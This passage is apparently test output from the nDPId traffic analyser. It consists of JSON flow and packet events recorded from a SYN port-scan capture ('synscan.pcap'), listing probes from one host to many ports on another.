+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsRewAADEG0YasEAAIQA2GNIzSBA\/dUoMYAAAAAGACCAAsgAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1539,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsi\/0AADsGgXWsEAAIQA2GNIzSHcvdUoMYAAAAAGACEAAKxAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsouwAADMGcoasEAAIQA2GNIzSJ+fdUoMYAAAAAGACEAAAqAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1551,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsu48AACwGYOOsEAAIQA2GNIzSGiTdUoMYAAAAAGACBAAaawAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1552,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAs1UEAADAGQzGsEAAIQA2GNIzSE5HdUoMYAAAAAGACBAAg\/gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsf\/4AADcGkXSsEAAIQA2GNIzSCRPdUoMYAAAAAGACEAAffAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAstkgAACkGaSqsEAAIQA2GNIzSIGLdUoMYAAAAAGACCAAQLQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAso8MAACYGfq+sEAAIQA2GNIzSB\/vdUoMYAAAAAGACDAAklAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAs1+sAACYGSoesEAAIQA2GNIzSBArdUoMYAAAAAGACDAAohQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsGmoAACUGCQmsEAAIQA2GNIzSB4\/dUoMYAAAAAGACCAApAAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsuV0AACkGZhWsEAAIQA2GNIzTBHvdU4MZAAAAAGACCAAsEQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAspJsAACsGeNesEAAIQA2GNIzTAw\/dU4MZAAAAAGACEAAlfQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsLg8AACoG8GOsEAAIQA2GNIzTGojdU4MZAAAAAGACDAASBAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAse\/UAADIGmn2sEAAIQA2GNIzTHQvdU4MZAAAAAGACDAAPgQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAshW8AADkGigOsEAAIQA2GNIzTAVTdU4MZAAAAAGACCAAvOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAs8AUAADIGJm2sEAAIQA2GNIzTB9LdU4MZAAAAAGACDAAkugAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsrEwAADAGbCasEAAIQA2GNIzTAojdU4MZAAAAAGACBAAyBAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAse4wAACkGo+asEAAIQA2GNIzTAnfdU4MZAAAAAGACCAAuFQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsuCkAACUGa0msEAAIQA2GNIzTBAndU4MZAAAAAGACCAAsgwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsiJEAACgGl+GsEAAIQA2GNIzTGafdU4MZAAAAAGACBAAa5QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsheEAACgGmpGsEAAIQA2GNIzTCcTdU4MZAAAAAGACBAAqyAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsxa0AACsGV8WsEAAIQA2GNIzTBDndU4MZAAAAAGACEAAkUwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsPY4AADEG2eSsEAAIQA2GNIzTwAndU4MZAAAAAGACCABwggAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsL4wAADMG5easEAAIQA2GNIzTBdzdU4MZAAAAAGACEAAisAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 